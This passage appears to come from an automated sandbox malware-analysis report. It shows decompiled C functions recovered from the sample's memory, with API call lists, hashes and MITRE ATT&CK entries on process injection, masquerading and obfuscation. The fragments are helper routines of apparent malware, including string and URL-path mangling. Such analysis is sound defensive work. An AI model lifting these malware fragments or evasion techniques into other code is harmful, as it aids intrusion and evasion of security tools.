					_t39 = _a8;
					_t38 = E04F6484B( &_v32, _t39);
					goto L13;
				}
			}

0x04f62954
0x04f62961
0x04f62967
0x04f62968
0x04f62969
0x04f6296a
0x04f6296b
0x04f6296f
0x04f6297b
0x04f6297f
0x04f62a07
0x04f62a07
0x04f62a0a
0x04f62a0c
0x04f62a14
0x04f62a1a
0x04f62a1d
0x04f62a1d
0x04f62a1a
0x04f62a28
0x04f62a28
0x04f62992
0x04f62994
0x04f62994
0x04f629ab
0x04f629af
0x04f629b2
0x04f629bd
0x04f629c4
0x04f629c4
0x04f629d0
0x04f629d1
0x04f629df
0x04f629d3
0x04f629d3
0x04f629d4
0x04f629d5
0x04f629d6
0x04f629d7
0x04f629d8
0x04f629d8
0x04f629e4
0x04f629e9
0x04f629eb
0x04f629ed
0x04f629ed
0x04f629f4
0x00000000
0x04f629f6
0x04f629f6
0x04f62a03
0x00000000
0x04f62a03

APIs

CreateEventA.KERNEL32(04F6D234,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730,?,?,?,?,04F687FA,?,00000001), ref: 04F629A5
SetEvent.KERNEL32(00000000,?,?,?,?,04F687FA,?,00000001,00000000,00000002,?,?,00000000), ref: 04F629B2
Sleep.KERNEL32(00000BB8,?,?,?,?,04F687FA,?,00000001,00000000,00000002,?,?,00000000), ref: 04F629BD
CloseHandle.KERNEL32(00000000,?,?,?,?,04F687FA,?,00000001,00000000,00000002,?,?,00000000), ref: 04F629C4

Part of subcall function 04F63549: WaitForSingleObject.KERNEL32(00000000,?,?,?,04F629E4,?,04F629E4,?,?,?,?,?,04F629E4,?), ref: 04F63623
Part of subcall function 04F63549: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04F629E4,?,?,?,?,?,04F687FA,?), ref: 04F6364B

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: 9d9b852d17f3c5755348c0d3b4a75348197e4b5284e80e83cd9bc026f550f717
Instruction ID: 868edcaaea41c6055c71a7bda618293d3fae55189746f63fa05cb6628c63e815
Opcode Fuzzy Hash: 9d9b852d17f3c5755348c0d3b4a75348197e4b5284e80e83cd9bc026f550f717
Instruction Fuzzy Hash: BE21C272D0025AABDB20BFE498809AE7779EB44354B0644A9EA57E7000E774FD439BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F62052, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E04F62052(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4f6d1f0, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4f6d208; // 0xc1b544ba
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4f6d208 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x04f6205a
0x04f6205d
0x04f62063
0x04f6207b
0x04f6207f
0x04f62082
0x04f62084
0x04f62087
0x04f62089
0x04f6208c
0x04f6208e
0x04f6208e
0x04f62090
0x04f6209b
0x04f620a0
0x04f620b1
0x04f620b9
0x04f620be
0x04f620c1
0x04f620c4
0x04f620c6
0x04f620cc
0x04f620cf
0x04f620cf
0x04f620cf
0x04f620da
0x04f620df
0x04f620e9

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F6951B,00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F6205D
RtlAllocateHeap.NTDLL(00000000,?), ref: 04F62075
memcpy.NTDLL(00000000,05E79630,-00000008,?,?,?,04F6951B,00000000,?,00000000,04F623DE,00000000,05E79630), ref: 04F620B9
memcpy.NTDLL(00000001,05E79630,00000001,04F623DE,00000000,05E79630), ref: 04F620DA

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 585f711f482fd4869bbaf9e04cf7ee63c3ea7f91917647c0f20b4c940c858d38
Instruction ID: bf2966713f181f6c8b01045fd804f4210e1e3d2e20c199a3197e90135633679c
Opcode Fuzzy Hash: 585f711f482fd4869bbaf9e04cf7ee63c3ea7f91917647c0f20b4c940c858d38
Instruction Fuzzy Hash: 1C110672E00119FFD7109A69EC88E9EBBEAEB91250B1542A6E415D7150E678EE01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04F682EB, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04F682EB(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04F62CDB(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4f6c2ac);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4f6c2ac);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x04f682f6
0x04f682fa
0x04f682fc
0x04f682fd
0x04f68305
0x04f68305
0x04f68309
0x00000000
0x00000000
0x04f68300
0x04f68301
0x04f68304
0x04f68304
0x04f68311
0x04f68318
0x04f6831c
0x04f68324
0x04f6832a
0x04f6832c
0x04f68331
0x04f68335
0x04f68337
0x04f6833a
0x04f68341
0x04f68341
0x04f6834b
0x04f6834e
0x04f68351
0x04f68351
0x04f6835d
0x04f6835d
0x04f6836a

APIs

StrChrA.SHLWAPI(?,00000020,00000000,05E7962C,?,00000001,?,04F6134F,05E7962C,?,00000001,00000000), ref: 04F68305
StrTrimA.SHLWAPI(?,04F6C2AC,00000002,?,00000001,?,04F6134F,05E7962C,?,00000001,00000000), ref: 04F68324
StrChrA.SHLWAPI(?,00000020,?,00000001,?,04F6134F,05E7962C,?,00000001,00000000), ref: 04F6832F
StrTrimA.SHLWAPI(00000001,04F6C2AC,?,00000001,?,04F6134F,05E7962C,?,00000001,00000000), ref: 04F68341

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 5e03c0f9bfb3280175b3206d04f176235f7db0004dab8479e0484a1c567d14a4
Instruction ID: b0ed8abee7656fdaa76613f1e9ea96b58e03bb2e1e8ebdb12480bcfa833f78d3
Opcode Fuzzy Hash: 5e03c0f9bfb3280175b3206d04f176235f7db0004dab8479e0484a1c567d14a4
Instruction Fuzzy Hash: 3A01D871B06315AFD320AE6E9C4AF2BBE98FB45AE0F11151DF882C7240DB64D803C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041B38A, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041B3B0

Part of subcall function 0041B1D5: __fltout2.LIBCMT ref: 0041B201

__cftog_l.LIBCMT ref: 0041B3D6
__cftoe_l.LIBCMT ref: 0041B408

Memory Dump Source

Source File: 00000000.00000002.575989176.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 2c506bf61e6a1c6871dd4cee11f3a9470a001f772e45525bd79c7e1cd31d0fbd
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 37114C3200014EBBCF125E85DC55CEE3F22FB19354B59841AFE2859131D73AC9B2AB8A

Uniqueness

Uniqueness Score: -1.00%

Function 04F61871, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E04F61871(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04F6A8C2(_t8, _t1);
				_t16 = E04F62CDB(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04F61CE1(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04F62CDB(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04F61D77(_t16);
				}
				return _t18;
			}

0x04f6187c
0x04f6187d
0x04f61880
0x04f61882
0x04f6188d
0x04f61891
0x04f61896
0x04f6189a
0x04f618a2
0x04f618a7
0x04f618af
0x04f618af
0x04f618b8
0x04f618bc
0x04f618c2
0x04f618c5
0x04f618cb
0x04f618cb
0x04f618d3
0x04f618d3
0x04f618da
0x04f618da
0x04f618e5

APIs

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

Part of subcall function 04F61CE1: wsprintfA.USER32 ref: 04F61D3D

lstrlen.KERNEL32(00000001,00000000,00000000,00000027,E8FA7DD7,00000000,7691C740,04F68A78,74666F53,00000000,00000001,00000000,?,00000001,00000000), ref: 04F618A7
lstrcpy.KERNEL32(00000000,00000000), ref: 04F618CB
lstrcat.KERNEL32(00000000,00000000), ref: 04F618D3

Strings

Soft, xrefs: 04F6187D, 04F61896

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: 611293d8d3555dd8b91e6059703a3630c95bb9a8eaa4072c380bdfcef4feae5d
Instruction ID: 9b553bb8e48221cb05606606a4203b7a81feb5526e3e5855c338126b596ef28c
Opcode Fuzzy Hash: 611293d8d3555dd8b91e6059703a3630c95bb9a8eaa4072c380bdfcef4feae5d
Instruction Fuzzy Hash: 1201D63290024DB7DB123B799C84AAF3BADEF85359F044521F94B95100DB38A947C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04F621AD, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F621AD() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4f6d224; // 0x1d0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4f6d264; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4f6d224; // 0x1d0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4f6d1f0; // 0x5a80000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x04f621ad
0x04f621b4
0x04f621fe
0x04f62200
0x04f62200
0x04f621b8
0x04f621be
0x04f621c3
0x04f621c7
0x04f621cd
0x04f621d4
0x00000000
0x00000000
0x04f621d6
0x04f621db
0x00000000
0x00000000
0x00000000
0x04f621db
0x04f621dd
0x04f621e5
0x04f621e8
0x04f621e8
0x04f621ee
0x04f621f5
0x04f621f8
0x04f621f8
0x00000000

APIs

SetEvent.KERNEL32(000001D0,00000001,04F64281), ref: 04F621B8
SleepEx.KERNEL32(00000064,00000001), ref: 04F621C7
CloseHandle.KERNEL32(000001D0), ref: 04F621E8
HeapDestroy.KERNEL32(05A80000), ref: 04F621F8

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 821f280372a0c25a7569fa555700b089dfcc18f14445f9260833caf2f67c29c6
Instruction ID: f8f76ce5a034936a067c4c19f7d1285820c7329c1aa97944ea80ad487278f1a0
Opcode Fuzzy Hash: 821f280372a0c25a7569fa555700b089dfcc18f14445f9260833caf2f67c29c6
Instruction Fuzzy Hash: 38F03731F0835AE7E7206AB5BE08B0636DCEB087517050550FD65E3184CE28DD018D50

Uniqueness

Uniqueness Score: -1.00%

Function 04F62D1E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F62D1E(WCHAR* _a4) {
				long _t11;
				WCHAR* _t12;

				_t12 = 0;
				_t11 = ExpandEnvironmentStringsW(_a4, 0, 0);
				if(_t11 != 0) {
					_t12 = E04F62CDB(_t11 + _t11);
					if(_t12 != 0 && ExpandEnvironmentStringsW(_a4, _t12, _t11) == 0) {
						E04F61D77(_t12);
						_t12 = 0;
					}
				}
				return _t12;
			}

0x04f62d27
0x04f62d31
0x04f62d35
0x04f62d40
0x04f62d44
0x04f62d53
0x04f62d58
0x04f62d58
0x04f62d44
0x04f62d5f

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,04F625B2,00410025,?,00000000,7691C740), ref: 04F62D2F

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04F62D4C

Part of subcall function 04F61D77: HeapFree.KERNEL32(00000000,00000000,04F69825,00000000,?,?,-00000008), ref: 04F61D83

Strings

pGtPGtht, xrefs: 04F62D1F

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandHeapStrings$AllocateFree
String ID: pGtPGtht
API String ID: 1564683301-395004550
Opcode ID: 0c0fdeaa4b52ca5689e61a45035e647a8af04a1d3c7a0d97470a611aa9938202
Instruction ID: 298f4da439fe4841553b07a32379f4fcf3d0e1d1ae91b58eb211c07788917b68
Opcode Fuzzy Hash: 0c0fdeaa4b52ca5689e61a45035e647a8af04a1d3c7a0d97470a611aa9938202
Instruction Fuzzy Hash: DDE01232A0193276823165AA9C88D8BEE9CEF967E13020665FD0AE3160DA11D85786F5

Uniqueness

Uniqueness Score: -1.00%

Function 04F6340E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
timeCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E04F6340E(void* __ecx) {
				struct _FILETIME _v12;
				void* _t6;

				GetSystemTimeAsFileTime( &_v12);
				_push(0);
				_t6 = _v12.dwLowDateTime + 0x2ac18000;
				_push(0x989680);
				asm("adc ecx, 0xfe624e21");
				_push(_v12.dwHighDateTime);
				_push(_t6);
				L04F6AE8A();
				return _t6;
			}

0x04f63417
0x04f63423
0x04f63425
0x04f6342a
0x04f6342f
0x04f63435
0x04f63436
0x04f63437
0x04f6343d

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,00000000,04F622CC), ref: 04F63417
_aulldiv.NTDLL(-2AC18000,04F622CC,00989680,00000000), ref: 04F63437

Strings

`Rt, xrefs: 04F63417

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem_aulldiv
String ID: `Rt
API String ID: 2806457037-3187195841
Opcode ID: 342b12aec2b7c8442dcfc69fd9b9be2825aa29643e29225d98aaefaeeecc4c4c
Instruction ID: 92f81e3c0f4ff0e80913e1ea21443659adaeb006bdc104ae927a4ebbfe939894
Opcode Fuzzy Hash: 342b12aec2b7c8442dcfc69fd9b9be2825aa29643e29225d98aaefaeeecc4c4c
Instruction Fuzzy Hash: 34D05BB690020CB7DF04E7D0DC4AE9E776CD74424CF000444B542A3241E574F9004720

Uniqueness

Uniqueness Score: -1.00%

Function 04F61E4E, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E04F61E4E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04F62CDB(_t2);
				if(_t34 != 0) {
					_t30 = E04F62CDB(_t28);
					if(_t30 == 0) {
						E04F61D77(_t34);
					} else {
						_t39 = _a4;
						_t22 = E04F6A92C(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E04F6A92C(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x04f61e4e
0x04f61e58
0x04f61e5a
0x04f61e60
0x04f61e60
0x04f61e69
0x04f61e6d
0x04f61e79
0x04f61e7d
0x04f61ef1
0x04f61e7f
0x04f61e7f
0x04f61e83
0x04f61e8a
0x04f61e8d
0x04f61ea7
0x04f61e96
0x04f61e96
0x04f61e9a
0x04f61e9d
0x04f61ea2
0x04f61ea2
0x04f61eac
0x04f61ed4
0x04f61eda
0x04f61edd
0x04f61eae
0x04f61eb0
0x04f61eb8
0x04f61ec3
0x04f61ec8
0x04f61ec8
0x04f61ee4
0x04f61eeb
0x04f61eec
0x04f61eec
0x04f61e7d
0x04f61efc

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04F647A8,00000000,00000000,00000000,05E79698,?,?,04F63BDE,?,05E79698), ref: 04F61E5A

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

Part of subcall function 04F6A92C: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F61E88,00000000,00000001,00000001,?,?,04F647A8,00000000,00000000,00000000,05E79698), ref: 04F6A93A
Part of subcall function 04F6A92C: StrChrA.SHLWAPI(?,0000003F,?,?,04F647A8,00000000,00000000,00000000,05E79698,?,?,04F63BDE,?,05E79698,0000EA60,?), ref: 04F6A944

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F647A8,00000000,00000000,00000000,05E79698,?,?,04F63BDE), ref: 04F61EB8
lstrcpy.KERNEL32(00000000,00000000), ref: 04F61EC8
lstrcpy.KERNEL32(00000000,00000000), ref: 04F61ED4

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 6eb8bff8f5a53c03856f1415db30594cae17e723c33d0d566522f5142a2b7cb4
Instruction ID: a9826223efd7257c122278e843be7de57f0899a2f4cdb8d4554750fb211ae2a3
Opcode Fuzzy Hash: 6eb8bff8f5a53c03856f1415db30594cae17e723c33d0d566522f5142a2b7cb4
Instruction Fuzzy Hash: D721A272900259FFDB12AF64CD84AAF7FA9DF56294B058054F8469B201DB35F902D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04F667E6, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04F667E6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04F62CDB(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x04f667fb
0x04f667ff
0x04f66809
0x04f66810
0x04f66813
0x04f66815
0x04f6681d
0x04f66822
0x04f66830
0x04f66835
0x04f6683f

APIs

lstrlenW.KERNEL32(004F0053,74E05520,?,00000008,05E79314,?,04F6844A,004F0053,05E79314,?,?,?,?,?,?,04F6878F), ref: 04F667F6
lstrlenW.KERNEL32(04F6844A,?,04F6844A,004F0053,05E79314,?,?,?,?,?,?,04F6878F), ref: 04F667FD

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04F6844A,004F0053,05E79314,?,?,?,?,?,?,04F6878F), ref: 04F6681D
memcpy.NTDLL(74E069A0,04F6844A,00000002,00000000,004F0053,74E069A0,?,?,04F6844A,004F0053,05E79314), ref: 04F66830

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: a35e2352061ae2aa01e80a4223399efaf8d6a444b1f84276ff28beb51be5afb0
Instruction ID: c26b2b2a87ea204e459762226477a530af613ebe0b3cf26191b7adab92401860
Opcode Fuzzy Hash: a35e2352061ae2aa01e80a4223399efaf8d6a444b1f84276ff28beb51be5afb0
Instruction Fuzzy Hash: 2CF04F76900118BBDF11EFA9CC48CDE7BACEF092987054462F909D7101E631EA11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F65F0B, Relevance: 5.0, APIs: 4, Instructions: 24stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04F62415,00000000,00000000,04F62415,0053002F,00000000), ref: 04F65F17
lstrlen.KERNEL32(?), ref: 04F65F1F

Part of subcall function 04F62CDB: RtlAllocateHeap.NTDLL(00000000,-00000008,04F69765), ref: 04F62CE7

lstrcpy.KERNEL32(00000000,?), ref: 04F65F36
lstrcat.KERNEL32(00000000,?), ref: 04F65F41

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 160d6ba28a8448c91b78e9d315f19bd2231f0ebc6ee244df65ac35f8fe0ba587
Instruction ID: 000b9450ab08b4eff6031afd66715daf5edbc3a758e8f4ae711a057f63900edf
Opcode Fuzzy Hash: 160d6ba28a8448c91b78e9d315f19bd2231f0ebc6ee244df65ac35f8fe0ba587
Instruction Fuzzy Hash: E5E01233905665FB87126BA4AC08C5FBBA9FF88720B054915F5D1D3110CB35D816DBE1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
